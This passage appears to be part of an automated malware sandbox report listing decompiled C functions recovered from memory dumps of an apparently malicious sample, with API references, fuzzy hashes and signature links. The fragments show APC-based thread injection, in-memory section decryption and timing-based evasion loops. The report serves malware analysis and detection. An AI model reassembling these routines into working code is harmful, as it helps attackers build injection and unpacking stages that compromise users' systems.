					 *0x75d160 = GetTickCount();
					_t12 = E00751A24(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L0075B02E();
							_t34 = _t14 + _t16;
							_t18 = E00754F23(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E007527C7(_t26) != 0) {
							 *0x75d298 = 1; // executed
						}
						_t12 = E0075520D(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x0075262f
0x00752635
0x00752636
0x00752642
0x00752648
0x0075264f
0x0075265f
0x00752664
0x0075266b
0x0075266d
0x00752672
0x00752678
0x0075267e
0x00752688
0x0075268c
0x0075268e
0x00752693
0x00752694
0x00752695
0x0075269a
0x007526a0
0x007526ab
0x007526ac
0x007526b2
0x007526b8
0x007526c4
0x007526c6
0x007526c6
0x007526d0
0x007526d0
0x00752651
0x00752653
0x00752653
0x007526da

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00751900,?), ref: 00752642
GetTickCount.KERNEL32 ref: 00752656
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00751900,?), ref: 00752672
SwitchToThread.KERNEL32(?,00000001,?,?,?,00751900,?), ref: 00752678
_aullrem.NTDLL(?,?,00000013,00000000), ref: 00752695
Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,00751900,?), ref: 007526B2

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: 9aba21f6d9bef1fef422be4ee070ba945eff65f0db5e18a6f1d6fba2c461ed03
Instruction ID: 7b8c2cac42f1859e352bdca0952b27649e508c35b8c91dbabe0402868b765c08
Opcode Fuzzy Hash: 9aba21f6d9bef1fef422be4ee070ba945eff65f0db5e18a6f1d6fba2c461ed03
Instruction Fuzzy Hash: 9811C672A40304AFD7205B74DC0EFDA76A8EB44353F008125FE19D65D1EAFDD84586A9

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE153C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECE153C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6ece41c0, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6ece1553
0x6ece1559
0x6ece155d
0x6ece1568
0x6ece1570
0x6ece1579
0x6ece157d
0x6ece1584
0x6ece158b
0x6ece158d
0x6ece1593
0x6ece1570
0x6ece1597

APIs

CreateThread.KERNELBASE ref: 6ECE1553
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6ECE1568
GetLastError.KERNEL32(00000000), ref: 6ECE1573
TerminateThread.KERNEL32(00000000,00000000), ref: 6ECE157D
CloseHandle.KERNEL32(00000000), ref: 6ECE1584
SetLastError.KERNEL32(00000000), ref: 6ECE158D

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 502d038911754073c5055afb3870cfa8f10a81f170744042957e05db530d660f
Instruction ID: 9937d8daeda335aa23bae9a5bffe45147171817a246ba492cd7f608a2ef67fa8
Opcode Fuzzy Hash: 502d038911754073c5055afb3870cfa8f10a81f170744042957e05db530d660f
Instruction Fuzzy Hash: 7AF08232205B20FBDB116BA89E0CF7FBF78FB0A751F000504F62590060C72599148BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0075520D, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E0075520D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E0075154A();
				if(_t21 != 0) {
					_t59 =  *0x75d294; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x75d294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x75d12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E007521DE( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x75d2e0; // 0x25ca5a8
					if( *0x75d294 > 5) {
						_t8 = _t26 + 0x75e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x75e9f9; // 0x44283a44
						_t27 = _t7;
					}
					E007511F4(_t27, _t27);
					_t31 = E00753598(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x75d2a8 =  *0x75d2a8 ^ 0x81bbe65d;
						_t32 = E007575F6(0x60);
						 *0x75d364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x75d364; // 0x2d295b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x75d364; // 0x2d295b0
							 *_t51 = 0x75e823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x75d270, 0, 0x43);
							 *0x75d300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x75d294; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x75d2e0; // 0x25ca5a8
								_t13 = _t58 + 0x75e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x75c2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E0075A82B( ~_v8 &  *0x75d2a8, 0x75d00c); // executed
								_t42 = E00754C40(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E007574A5(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00755461(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E00753FC2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x75d128();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E00755AB2(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x0075520d
0x00755218
0x0075521b
0x0075521e
0x00755221
0x00755228
0x0075522a
0x00755236
0x00755238
0x00755238
0x00755241
0x00755247
0x0075524c
0x00755266
0x00755272
0x00755274
0x00755279
0x00755283
0x00755283
0x0075527b
0x0075527b
0x0075527b
0x0075527b
0x0075528a
0x00755297
0x0075529e
0x007552a3
0x007552a3
0x007552ab
0x007552ae
0x007552d4
0x007552e0
0x007552e5
0x007552ea
0x007552ec
0x00755318
0x0075531a
0x007552ee
0x007552f2
0x007552f7
0x007552fc
0x00755303
0x00755309
0x0075530e
0x00755314
0x0075531b
0x0075531d
0x0075531f
0x0075532e
0x00755334
0x00755339
0x0075533b
0x0075536b
0x0075536d
0x0075533d
0x0075533d
0x00755343
0x00755350
0x00755356
0x00755356
0x0075535e
0x00755367
0x0075536e
0x00755370
0x00755372
0x00755379
0x00755386
0x0075538b
0x00755390
0x00755392
0x00755394
0x00000000
0x00000000
0x00755396
0x0075539b
0x0075539d
0x007553a4
0x007553a8
0x007553ab
0x007553c0
0x007553c4
0x007553c9
0x00000000
0x007553c9
0x007553ad
0x007553af
0x00000000
0x00000000
0x007553ba
0x007553bc
0x007553be
0x00000000
0x00000000
0x00000000
0x007553be
0x007553a1
0x007553a1
0x00755372
0x007552b0
0x007552b0
0x007552b5
0x007553cb
0x007553cf
0x007553d7
0x007553d7
0x00000000
0x007553cf
0x007552bb
0x007552be
0x007552c8
0x007552cf
0x00000000
0x007553df
0x007553df
0x007553e3
0x007553e7
0x007553e7

APIs

Part of subcall function 0075154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,00755226,00000000,00000000), ref: 00751559

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 007552A3

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

memset.NTDLL ref: 007552F2
RtlInitializeCriticalSection.NTDLL(02D29570), ref: 00755303

Part of subcall function 00753FC2: memset.NTDLL ref: 00753FD7
Part of subcall function 00753FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00754019
Part of subcall function 00753FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 00754024

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0075532E
wsprintfA.USER32 ref: 0075535E

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 5de8bcfa0873fbbf70304e678715e754634091b512961dbae3a8a481029c8c1c
Instruction ID: 4f5f656ca6f1c7504fdc754100d8aa1e19c810d5e547ceaee0ce96d4809d418d
Opcode Fuzzy Hash: 5de8bcfa0873fbbf70304e678715e754634091b512961dbae3a8a481029c8c1c
Instruction Fuzzy Hash: 695101B1A00B14EBDB31ABA0DCA9BEE33A8BB04757F144425ED09D7151E6FC9D4C8B94

Uniqueness

Uniqueness Score: -1.00%

Function 007578E6, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E007578E6(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E007575F6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00754AAB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E007575F6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x75d2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x007578ed
0x007578f4
0x007578f9
0x007578fc
0x00757903
0x00757906
0x00757909
0x0075790e
0x00757913
0x00757a67
0x00757a69
0x00757a6b
0x00757a70
0x00757a70
0x00757919
0x0075791c
0x0075791f
0x00757921
0x00757921
0x00757925
0x00000000
0x00000000
0x00757929
0x00757955
0x0075795a
0x0075795c
0x0075795c
0x0075795f
0x00757962
0x00757962
0x00757964
0x00000000
0x0075792f
0x00757931
0x00757950
0x00757950
0x00757967
0x00757967
0x00757968
0x00757968
0x0075796b
0x00000000
0x00000000
0x00000000
0x0075796b
0x00757935
0x0075797c
0x00757980
0x00757a5a
0x00757a5c
0x00757a5c
0x00757a5d
0x00757a60
0x00000000
0x00757a60
0x00757989
0x0075799a
0x0075799e
0x00757a56
0x00000000
0x00757a56
0x007579a4
0x007579a7
0x007579ab
0x007579af
0x007579b4
0x00757a4c
0x00757a4c
0x00000000
0x00757a52
0x007579bf
0x007579c8
0x007579dc
0x007579e3
0x007579f8
0x007579fe
0x00757a06
0x00000000
0x00000000
0x00000000
0x00000000
0x00757a08
0x00757a08
0x00757a08
0x00757a0f
0x00757a17
0x00000000
0x00000000
0x00757a19
0x00757a22
0x00000000
0x00000000
0x00000000
0x00757a24
0x00757a26
0x00757a29
0x00757a29
0x00757a2c
0x00757a30
0x00757a33
0x00757a39
0x00757a3c
0x00757a43
0x00000000
0x007579bf
0x0075793a
0x00757942
0x00757948
0x0075794a
0x0075794a
0x0075794d
0x0075794f
0x00000000
0x0075794f
0x00757929
0x0075796f
0x00757974
0x00757976
0x00757976
0x00757979
0x00757979
0x00000000

APIs

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

lstrcpy.KERNEL32(69B25F45,00000020), ref: 007579E3
lstrcat.KERNEL32(69B25F45,00000020), ref: 007579F8
lstrcmp.KERNEL32(00000000,69B25F45), ref: 00757A0F
lstrlen.KERNEL32(69B25F45), ref: 00757A33

Strings

, xrefs: 0075797C

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 6514a3ee4d282671f29a6ac890cb3cd6e842edefe27c9d7acc73a86820bbfa73
Instruction ID: 52099203761ccb82c12f75f57248210b05cc0e32037c8c2ca32f146ba0bdfbb9
Opcode Fuzzy Hash: 6514a3ee4d282671f29a6ac890cb3cd6e842edefe27c9d7acc73a86820bbfa73
Instruction Fuzzy Hash: 8251B031A08218EFCF19DF99D9447EDBBB6EF45316F14C056EC14AB201C7B8AA49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6ECFC1E0, Relevance: 6.8, APIs: 1, Strings: 2, Instructions: 1541COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,6ED8C338,000008BB), ref: 6ECFD345

Strings

1, xrefs: 6ECFDB8D
N, xrefs: 6ECFD29D

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: FileModuleName
String ID: 1$N
API String ID: 514040917-3127171972
Opcode ID: 6e74c4182ec39160bd6cd1ef22e06da5858a609784d352e38ea13f6de0602b26
Instruction ID: e9e682c666384684f1587f6406711de40615ed1304511afd48608f06436a6cb9
Opcode Fuzzy Hash: 6e74c4182ec39160bd6cd1ef22e06da5858a609784d352e38ea13f6de0602b26
Instruction Fuzzy Hash: A2036D71524960CEEBC8CF69C69067E7BF2FB97300B14812AD545AA3CDE33D558AEB04

Uniqueness

Uniqueness Score: -1.00%

Function 00754F07, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00754F07(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				long _t54;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0x75d130(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E007575F6(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x75d2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E00754AAB(_v20);
											if(_v8 == 0) {
												_t54 = E00753B3F(_v24, _t74); // executed
												_v8 = _t54;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E0075121A(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x00754f08
0x00754f0e
0x00754f19
0x00754f19
0x00754f1b
0x00757613
0x00757616
0x0075761f
0x00757622
0x00757625
0x0075762d
0x0075772b
0x00757731
0x00757739
0x0075773b
0x00000000
0x0075773b
0x00757633
0x00757636
0x0075773e
0x0075773e
0x0075763c
0x00757643
0x0075764b
0x00757722
0x00757651
0x00757657
0x0075765c
0x00757661
0x00757710
0x00757667
0x00000000
0x00757667
0x00757667
0x00757667
0x00757667
0x0075766c
0x0075766e
0x0075766e
0x0075767b
0x00757683
0x00000000
0x00000000
0x00757685
0x00757692
0x00757698
0x00757698
0x0075769b
0x00000000
0x00000000
0x0075769d
0x007576a8
0x007576bc
0x007576f2
0x007576be
0x007576be
0x007576c5
0x007576cd
0x00000000
0x007576cf
0x007576cf
0x007576d5
0x007576dd
0x007576e4
0x00000000
0x007576e4
0x007576dd
0x007576cd
0x007576f5
0x007576f8
0x00757700
0x00757706
0x0075770b
0x0075770b
0x00000000
0x00757700
0x007576a5
0x00000000
0x007576e7
0x007576e7
0x00000000
0x007576f0
0x00757717
0x00757717
0x0075771d
0x0075771d
0x0075764b
0x00757636
0x00757748
0x00754f10
0x00754f10
0x00754f17
0x00754f22
0x00000000
0x00000000
0x00000000
0x00754f17

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 007576AF
GetLastError.KERNEL32 ref: 007576CF

Part of subcall function 0075121A: wcstombs.NTDLL ref: 007512DC

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID:
API String ID: 2344289193-0
Opcode ID: 9e5219b376ec86178551e394cb39ae38c1ff5df8b1df10d4f7b4e8f9c9654e5c
Instruction ID: 5a21acffec5839a288a48434114ee003e594e4bd1a4565e8ed9103cd1e23ed17
Opcode Fuzzy Hash: 9e5219b376ec86178551e394cb39ae38c1ff5df8b1df10d4f7b4e8f9c9654e5c
Instruction Fuzzy Hash: 12414F70904209EFDF149FA8ED84AEEB7B5FB08346F208869E801E3151D7B89E48DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00753DA0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00753DFD
SysAllocString.OLEAUT32(007528D9), ref: 00753E41
SysFreeString.OLEAUT32(00000000), ref: 00753E55
SysFreeString.OLEAUT32(00000000), ref: 00753E63

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0042bb42607aebe9e0bdf9e3aecf8e1b0eed6c8e1b766dcb3ecef737f8748cbe
Instruction ID: df5c2a39dfdbe4968e40bc2489a3df01438506a783cd242abf15ed583240b813
Opcode Fuzzy Hash: 0042bb42607aebe9e0bdf9e3aecf8e1b0eed6c8e1b766dcb3ecef737f8748cbe
Instruction Fuzzy Hash: 82311D72900249EFCB15CF98D8859EE7BB5FF08341B20842EF905DB260D7B89A85CF65

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE189E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6ECE189E(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x6ece41b0;
				_t46 = E6ECE2016(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x6ece41c0;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x6ece51a7; // 0x6ece51a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E6ECE1AA6(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x6ece41c0 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x6ece18a5
0x6ece18b5
0x6ece18ba
0x6ece18bf
0x6ece18d4
0x6ece18db
0x6ece18e0
0x6ece18f1
0x6ece18f4
0x6ece18fa
0x6ece18ff
0x6ece19b2
0x6ece1905
0x6ece1905
0x6ece190b
0x6ece197a
0x6ece190d
0x6ece190d
0x6ece1910
0x6ece1912
0x6ece191a
0x6ece191d
0x6ece1920
0x6ece1928
0x6ece1933
0x6ece1934
0x6ece1935
0x6ece1952
0x6ece1960
0x6ece1967
0x6ece196a
0x6ece196d
0x6ece1975
0x00000000
0x00000000
0x6ece1925
0x6ece1925
0x6ece1977
0x6ece1984
0x6ece1999
0x6ece1986
0x6ece198f
0x6ece1994
0x6ece19aa
0x6ece19aa
0x6ece19b9
0x6ece19bf

APIs

VirtualAlloc.KERNELBASE(00000000,751463F0,00003000,00000004,00000030,00000000,751463F0,00000000,?,?,?,?,?,?,6ECE163B,00000000), ref: 6ECE18F4
memcpy.NTDLL(?,6ECE163B,751463F0,?,?,?,?,?,?,6ECE163B,00000000,00000030,751463F0,00000000), ref: 6ECE198F
VirtualFree.KERNELBASE(6ECE163B,00000000,00008000,?,?,?,?,?,?,6ECE163B,00000000), ref: 6ECE19AA

Strings

Sep 18 2021, xrefs: 6ECE192B

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
